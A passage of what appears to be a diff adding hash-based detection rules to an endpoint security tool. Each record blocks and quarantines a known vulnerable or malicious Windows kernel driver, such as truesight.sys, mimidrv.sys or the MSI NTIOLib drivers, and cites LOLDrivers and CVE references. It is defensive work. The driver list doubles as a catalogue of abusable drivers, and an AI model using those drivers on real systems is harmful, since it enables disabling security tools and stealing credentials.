+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.616406Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "990165725debccea7ca15aa4ed7a0e3a2a25b4a72cb309a27c899bd0e4b5148f",
+ "comment": "American Megatrends vulnerable BIOS flash tool (aka UCOREW64.SYS and amifldrv64.sys) [https://www.loldrivers.io/drivers/a338a9fc-9fe3-400c-9fe4-69bb7892602d/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "fb8a86ef-bf0c-5305-ac30-57122fa59a8c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.828047Z",
+ "creation_date": "2026-03-23T11:45:30.828049Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.828054Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b4059ef4aced7c629f7ae56ac40c6bdcedc43fa9077990ee5994556de40c0f95",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "fba0be65-8fd0-53c5-9649-639b2735b92b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.812186Z",
+ "creation_date": "2026-03-23T11:45:31.812188Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.812194Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "85e24c00c5c5de599141a735c97d584da8bb39bbcd8f78447f7522866e90ac6a",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "fbaa4cc5-4f4f-5c15-80ae-bd7014370e92",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.984675Z",
+ "creation_date": "2026-03-23T11:45:29.984677Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.984683Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "6071db01b50c658cf78665c24f1d21f21b4a12d16bfcfaa6813bf6bbc4d0a1e8",
+ "comment": "Vulnerable Kernel Driver (aka VBoxUSB.Sys) [https://www.loldrivers.io/drivers/5938df1d-9513-449f-8252-c442ddca0c2a/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "fbb51792-c97c-58e3-b0dd-053d169ddc97",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.831567Z",
+ "creation_date": "2026-03-23T11:45:30.831569Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.831574Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ba8cc319eac7d94be45bb67e8fe746da519fc457b0479621464b861eed80b360",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "fbba39da-5cc1-510e-ad39-9be9f7e1f57d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.828895Z",
+ "creation_date": "2026-03-23T11:45:30.828897Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.828902Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b72ea6d11a53e4f4e094aa635b9c039f47093b0f722e88d2681d1270e8ef4698",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "fbbe80ce-6f61-57c6-9ffe-e5122d6ccb44",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.978510Z",
+ "creation_date": "2026-03-23T11:45:29.978512Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.978517Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "68dca726b16c56c70259c8f936ec20adb9ecb8c3cc73985083f41358c83935f4",
+ "comment": "Vulnerable Kernel Driver (aka sandra.sys) [https://www.loldrivers.io/drivers/a7628504-9e35-4e42-91f7-0c0a512549f4/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "fbe8c7be-3e4c-53b1-b933-0a3fb3e39cd1",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.156706Z",
+ "creation_date": "2026-03-23T11:45:31.156708Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.156714Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2a3ce27a2f733926e2666c7911efd01c2ab2e5d788aab5fe4e347c99ea2cb241",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "fbf23471-f2ca-5fe7-a959-896d29c96c78",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.614562Z",
+ "creation_date": "2026-03-23T11:45:29.614564Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.614570Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "50d5eaa168c077ce5b7f15b3f2c43bd2b86b07b1e926c1b332f8cb13bd2e0793",
+ "comment": "MICRO-STAR vulnerable drivers (aka NBIOLib_X64.sys, NTIOLib_X64.sys, NTIOLib.sys and NBIOLib.sys) [CVE-2021-44899] [http://blog.rewolf.pl/blog/?p=1630] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "fbfa9ab3-f36d-58f7-86b3-e5aa9695f89c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.141095Z",
+ "creation_date": "2026-03-23T11:45:31.141098Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.141106Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ea21b449d1dea61c47d55ecc9981ab7c2959d6652907a303163600f67f58542a",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "fc1e8d2b-e1f0-5273-9b1d-bc9a0379c31a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.145755Z",
+ "creation_date": "2026-03-23T11:45:32.145757Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.145762Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f43b0b9a1d1445ba66e8370397cb22142439fa4062b7b05e30f9b26a370d767c",
+ "comment": "Malicious Kernel Driver (aka driver_668c5bea.sys) [https://www.loldrivers.io/drivers/04eefdf4-448d-45bb-87fc-93f263fc77f4/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "fc30359b-bdac-53a9-a72d-0812411f6ab8",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.466972Z",
+ "creation_date": "2026-03-23T11:45:30.466975Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.466985Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7b49579b74108e2418a6b401cd729e3fafe1c8ba1fe8434f73c8d0f1758b08d3",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "fc3362e1-7c3c-5445-9d07-d05024d5b7c9",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.155136Z",
+ "creation_date": "2026-03-23T11:45:31.155138Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.155144Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "9e0245a1671aaef05e6622fc3714cd12c2a462d671e7d5fc27dff521f7b990af",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "fc38f201-6e9c-54ee-a11e-368d06f001e0",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.471318Z",
+ "creation_date": "2026-03-23T11:45:30.471322Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.471330Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "bdcacb9f373b017d0905845292bca2089feb0900ce80e78df1bcaae8328ce042",
+ "comment": "Vulnerable Kernel Driver (aka rwdrv.sys) [https://www.loldrivers.io/drivers/fbdd993b-47b1-4448-8c41-24c310802398/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "fc3cf96f-1b6b-5228-8543-5ab39a7d8a72",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.815490Z",
+ "creation_date": "2026-03-23T11:45:31.815492Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.815498Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d2b85836b0888b91b3ad457d025d411bcc580c3bb74eadb8f3a5db87da94ebf0",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "fc3efe2e-cc59-5263-abad-c17d7af26d3c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.605285Z",
+ "creation_date": "2026-03-23T11:45:29.605287Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.605293Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "3c97b5c4ed563047d79e7e015a691d00f06c3737ef156d1e5b4bdfe325b6f7d9",
+ "comment": "Process Hacker driver (aka kprocesshacker.sys) [https://processhacker.sourceforge.io/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "fc4a48b7-8ea0-5d9e-b5d9-17410fb4d17b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.824915Z",
+ "creation_date": "2026-03-23T11:45:30.824919Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.824928Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "20e178dce3eff6e8a1c1cb1f70d669c3e5a5ef3fa5e961b14975fb69eec1f2d5",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "fc4db004-c402-50d7-b753-80fec151d311",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.604243Z",
+ "creation_date": "2026-03-23T11:45:29.604245Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.604250Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "93f787e33a663311a6a553db1c7d7e5b3f4cd20b0b7725b35dbd0dd67308cef4",
+ "comment": "Vulnerable Kernel Driver (aka BEDAISY.SYS) [https://www.loldrivers.io/drivers/db666d40-c9fa-4039-bfac-a5d7afd61b67/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "fc5355c6-2e4f-59e4-a411-cc807cdf9a10",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.604969Z",
+ "creation_date": "2026-03-23T11:45:29.604970Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.604976Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2269f6117274297a63e149c6dac51bc3780fd1f64b111f5fa535e1d5718ebccf",
+ "comment": "Process Hacker driver (aka kprocesshacker.sys) [https://processhacker.sourceforge.io/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "fc5d492f-7c7f-54e5-bce4-ec16139e95c6",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.489928Z",
+ "creation_date": "2026-03-23T11:45:31.489931Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.489940Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "193d2589c7c929ad3dccc5c8cace740f018615c6d2f3f210e362de1abb06e5c6",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "fc5f422e-4d08-5fe3-bc3f-5fa9a2b9614a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.144176Z",
+ "creation_date": "2026-03-23T11:45:31.144177Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.144183Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a5605d952927cc8cbfa504498e70585410bd3224c04fd5f57ab6586a4afb11f5",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "fc662720-fa09-5f24-be58-45978b2757c8",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.609702Z",
+ "creation_date": "2026-03-23T11:45:29.609704Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.609709Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "5351c81b4ec5a0d79c39d24bac7600d10eac30c13546fde43d23636b3f421e7c",
+ "comment": "Novell vulnerable driver (aka nicm.sys, nscm.sys and ncpl.sys) [CVE-2013-3956] [https://www.loldrivers.io/drivers/f4126206-564f-49f5-a942-2138a3131e0e/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "fc6adc50-9e4c-55c8-a42b-52186b5d3413",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.454388Z",
+ "creation_date": "2026-03-23T11:45:30.454391Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.454400Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d9500af86bf129d06b47bcfbc4b23fcc724cfbd2af58b03cdb13b26f8f50d65e",
